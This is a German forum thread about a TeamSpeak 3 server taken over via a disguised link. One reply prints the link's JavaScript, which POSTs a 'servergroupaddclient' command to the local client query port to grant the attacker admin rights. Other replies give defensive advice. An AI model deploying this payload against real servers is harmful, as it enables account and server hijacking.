Register for your free account! | Forgot your password?

Go Back   elitepvpers > Off-Topics > Technical Support
Teamspeak gehackt via Link Teamspeak gehackt via Link
You last visited: Today at 11:55

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement


Advertise with us!

Teamspeak gehackt via Link

Discussion on Teamspeak gehackt via Link within the Technical Support forum part of the Off-Topics category.

Reply
 
Old   #1
 
elite*gold: 0
The Black Market: 3/0/0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
Teamspeak gehackt via Link

Mein Teamspeak 3 Server wurde gestern opfer eines Hack
der folgen gelaufen ist

Er hat eine URL gepostet die versteckt in einer anderen URL war
hab auf dem Link geklickt und dann hatte der Typ auf einmal alle Rechte die ich hatte den Server klein gemacht und alles gelöscht

Ich frage mich A. wie geht das und B. welche Gegenmaßnahmen sollte ich unternehmen

Hab mir bereichst ne neue Identität erstellt und die Rechte von dem alten Entfernt

Was dazu kommt ist das der User der das gemacht hatte noch irgendwelche Icons hatte die ich garnicht auf dem Server habe wie kommt das?
Draygh is offline  
Old 03/18/2017, 16:47   #2


 
Ares's Avatar
 
elite*gold: 1640
The Black Market: 141/0/0
Join Date: Jun 2012
Posts: 18,889
Received Thanks: 9,335
Kannst du mir die URL mal schicken (bitte nicht hier posten)?
Eventuell ist er in TS noch unter Extras -> Gesammeltes URLs gespeichert.
Ares is offline  
Old 03/18/2017, 17:53   #3
 
LucaXY's Avatar
 
elite*gold: 30
The Black Market: 20/0/0
Join Date: Jun 2015
Posts: 460
Received Thanks: 90
Mir pls. Auch mal in einer DM würde mir das gerne mal anschauen 🤣
LucaXY is offline  
Old 03/18/2017, 21:26   #4
 
elite*gold: 32
The Black Market: 84/0/0
Join Date: Dec 2015
Posts: 2,275
Received Thanks: 1,113
Danke für den link erstmal.

Der fuchs chickt via XMLREquest (ajax oder?) requests an deinen Server

function cMultiToolCreator() {
var cMultiTool = new XMLHttpRequest();
cMultiTool.open('POST', 'http://127.0.0.1:25639', true);
cMultiTool.onreadystatechange = function() {
return true
};
cMultiTool.send("servergroupaddclient sgid=46 cldbid=3712" + "\n")
}

servergroupaddclient sgid=46 cldbid=3712

Das addet wohl ihn zur gruppe 46 (admins?)


//Um einen erneuten angriff vorzubeugen:
1. Öffne niemals dort links/dateien wo dein Server hostet.
2. Änder default werte (wie z.b der Port 25639 usw) dann schafft so ein script es nicht sich zu verbinden.
FlyffServices is offline  
Thanks
1 User
Old 03/18/2017, 22:23   #5
 
elite*gold: 0
The Black Market: 3/0/0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
Ah danke für die Hilfe

aber ne GID 46 gibt es bei uns im TS garnicht
Draygh is offline  
Old 03/19/2017, 12:52   #6


 
Ares's Avatar
 
elite*gold: 1640
The Black Market: 141/0/0
Join Date: Jun 2012
Posts: 18,889
Received Thanks: 9,335
Sicher? Die Zahl scheint mir nicht zufällig gewählt worden zu sein. In einem anderen Script verwenden sie die 6404 als ID. Standard ist das zumindest nicht.
Ares is offline  
Old 03/19/2017, 18:40   #7
 
elite*gold: 0
The Black Market: 3/0/0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
mmh komisch
aber da reichen meine Kenntnisse nicht aus um da genauer drauf eingehen zu können

Kann auch sein das es der denjenige der Gebannt wurden ist bzw mal Admin bei uns wahr zusammenhängt


also wenn du dafür mehr infomationen brauchst kann ich dir anbieten das wir uns mal im TS treffen oder so wäre glaub besser dafür
Draygh is offline  
Old 03/20/2017, 15:54   #8
 
elite*gold: 57
The Black Market: 9/0/0
Join Date: Jun 2011
Posts: 2,220
Received Thanks: 865
Ist der Server selbst gehostet oder hast du nur den ServerAdmin? Wenn du noch den ServerQuery Admin hast, dann kannst du ja für die normalen Server Admins die Berechtigung entfernen einem anderen User eine Gruppe zuzuweisen bzw. die Berechtigung entfernen, benutzerspezifische Berechtigungen zu vegeben.. dann bist du definitiv safe. Außerdem wäre es sinnvoll den Quer-Port nur zugänglich zu machen, wenn man von intern connectet, dann müsstest du das über einen SSH-Tunnel machen.
Zypr is offline  
Old 03/20/2017, 20:44   #9
 
elite*gold: 424
The Black Market: 3/0/0
Join Date: Dec 2012
Posts: 4,208
Received Thanks: 903
Sowas geht nur, wenn der server nachlässig eingestellt ist.
Benutzer, die rechte verlieren, sollten auch kontroliert werden, ob am client rechte vergeben sind. Wird gerne vergessen. Oder rechte an channels koppeln. Wer dann dort drin ist, hat bestimmte rechte.
Verleihnix is offline  
Old 03/20/2017, 22:19   #10
 
elite*gold: 0
The Black Market: 3/0/0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
Das Skript hat so gearbeitet das es sich als mich ausgegeben hat und den Angreifer zum Server Admin gemacht hat da der Angreifer anscheiden die ID wusste kann es nur ein Ex Admin gewesen sein

da spielt es keine Rolle ob ich nun File Rechte für den Server hab oder nicht er hat einfach meine normalen Adminrechte dazu verwenden sich in die Gruppe zu adden

PS: ich muss dazu sagen das ich es so erklärt bekommen habe
Draygh is offline  
Old 03/20/2017, 22:47   #11
 
elite*gold: 57
The Black Market: 9/0/0
Join Date: Jun 2011
Posts: 2,220
Received Thanks: 865
Quote:
Originally Posted by Draygh View Post
Das Skript hat so gearbeitet das es sich als mich ausgegeben hat und den Angreifer zum Server Admin gemacht hat da der Angreifer anscheiden die ID wusste kann es nur ein Ex Admin gewesen sein

da spielt es keine Rolle ob ich nun File Rechte für den Server hab oder nicht er hat einfach meine normalen Adminrechte dazu verwenden sich in die Gruppe zu adden

PS: ich muss dazu sagen das ich es so erklärt bekommen habe
Aber wie bereits erwähnt, wenn du die Rechte so anpasst, dass du keinem anderen User eine Gruppe oder spezifische Benutzerrechte zuweisen kannst, dann wird das nicht passieren.
Zypr is offline  
Old 03/20/2017, 22:49   #12
 
elite*gold: 0
The Black Market: 3/0/0
Join Date: Apr 2015
Posts: 70
Received Thanks: 2
Stimmt schon aber es ist einfach bequemer und man denk an sowas garnicht xd
aber immerhin ein hoh auf das Backup xd


Das Problem ist aber auch das es da passiert ist wo man kein QueryAdmin oder sowas hat
Draygh is offline  
Reply

« Windows neu aufsetzen - "Kann auf Partition nicht installiert werden" | Mac book Pro Mitte 2009 Akku »

Similar Threads Similar Threads
[Teamspeak] Link verstecken
04/01/2013 - Tutorials - 7 Replies
Hi Leute. Hier ein kleiner Trick wie man Links bei TS verstecken kann, den ich per Zufall (Wie auch viele Sachen im Leben) herausgefunden habe. Undzwar geht es so. Schreibt eurem Freund den Code: http://pastebin.com/aHQ6LY5J Nun würde bei eurem Freund der Link erscheinen:
TeamSpeak gehackt! Kann mir wer Helfen?
11/17/2012 - Off Topic - 10 Replies
Hallo Forum! Schlechte Nachricht für mein Teamspeak! Also Heute um ca 13 Uhr kamen 2 Neue Leute aufs TS.. Diese hatten nach ca 2 Minuten Admin Rechte und Entzogen unsere. Ich kann nichts mehr ändern! Kein Webinterface oder sonstiges! Support wird nicht Helfen. (Erfahrung) Kann uns wer von euch Helfen? Der Server ist wirklich Gehackt (sieht man schon beim Connecten) Wen ihr eine Lösung findet..Egal ob Legal oder Illegal..Helft uns Bitte! Mit Glück springt was herraus!



All times are GMT +2. The time now is 11:55.

elitepvpers - play less, get more - Top

Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.